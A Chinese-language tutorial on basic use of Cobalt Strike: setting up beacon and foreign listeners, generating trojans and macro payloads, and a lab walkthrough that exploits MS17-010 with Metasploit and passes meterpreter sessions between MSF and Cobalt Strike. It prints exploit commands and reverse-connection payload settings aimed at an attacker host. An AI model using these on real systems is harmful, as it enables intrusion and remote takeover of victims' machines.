Cobalt Strike基础使用
文章作者:华盟安全团队-- Gaowu
Cobalt Strike分为客户端组件和服务器组件,服务器的组件也是团队服务器,可以放在局域网或者公网下进行团队使用,也是Cobalt Strike社会工程功能的托管机器,团队服务器还可以存储由Cobalt Strike收集的数据,并且进行日志管理。
Cobalt Strike服务器必须在Linux系统上运行,这里演示服务器在Linux KALI端,本地进行Cobalt Strike客户端的连接。
CobaltStrike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木马生成,windows dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑。钓鱼攻击包。
CS使用
启动CS服务端
启动客户端
服务端启动后客户端启动进行连接(团队多人连接将用户名设置为自己的用来区分团队成员)
主界面
CS功能使用(主机上线)
1.设置监听器用来接收会话
name:监听器名字
payload:payload类型
Host: shell反弹的主机,kali IP
Port: 反弹端口
这里Payload有9种选项,如下:
内部的Listener
windows/beacon_dns/reverse_dns_txt
windows/beacon_dns/reverse_http
windows/beacon_http/reverse_http
windows/beacon_https/reverse_https
windows/beacon_smb/bind_pipe
外部的Listener
windows/foreign/reverse_dns_txt
windows/foreign/reverse_http
windows/foreign/reverse_https
windows/foreign/reverse_tcp
Beacon为内置的监听器,在目标主机执行相应的payload,获取shell到cs上;其中包含DNS、HTTP、HTTPS等,Beacon可以选择通过DNS还是HTTP/S协议出口网络,甚至可以在使用Beacon通讯过程中切换HTTP和DNS。其支持多主机连接,部署好Beacon后提交一个要连回的域名或主机的列表,Beacon将通过这些主机轮询。目标网络的防护团队必须拦截所有的列表中的主机才可中断和其网络的通讯。通过种种方式获取shell以后(比如直接运行生成的exe),就可以使用Beacon了。
Foreign为外部结合的Listener,经常用于MSF的结合,例如获取meterpreter到MSF上。
2.生成木马
HTML Application 生成恶意的HTA木马文件;
MS Office Macro 生成office宏病毒文件;
Payload Generator 生成各种语言版本的payload;
Windows Executable 生成可执行exe木马;
Windows Executable(S) 生成无状态的可执行exe木马
生成后会保存到指定地方,通过某种方式上传到对方机器上,可以通过Webshell方式等这里不在讲解了
受害者运行exe文件我们的CS就直接上线了
这是生成exe文件,还可以生成宏病毒等上面介绍到的。
3.正常我们进去需要调整响应的时间,sleep 3 就行。
可以对我们上线的机器进行以下操作,也可以联动MSF进行使用
联动MSF使用
将MSF的会话转发到CS上
通过漏洞复现演示MSF获取目标Session
KALI:192.168.50.218
CS:192.168.50.130
受害者IP:192.168.50.185
1.发现漏洞
Nmap -A扫描目标开放了445端口
通过使用MSF辅助模块扫描发现存在ms17_010漏洞
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.50.185
exploit
查找漏洞利用模块
漏洞利用
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set RHOST 192.168.50.185
Run
获取后 我们background获取session
与CS联动,将会话转发到CS中
CS配置新建一个监听
KALI中配置
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.50.218 //KALI IP
set lport 4443 与CS同端口
set session 1
CS这边就接收到了MSF的会话
CS的会话转发到MSF中
由于生成的木马就是HTTP的,所以委派给msf时,监听器还是HTTP的
CS添加一个监听器
MSF准备
Use exploit/multi/handler
Set payload windows/meterpreter/reverse_http
Set lhost ip
Set lport ip
设置完成后我们就可以使用CS进行委派会话了
选中我们刚刚创建的就行
这样我们的MSF端就会获取到这个会话
CS还有非常多的功能,大家慢慢发现
注:本文是原创文章转载本文须注明来源及作者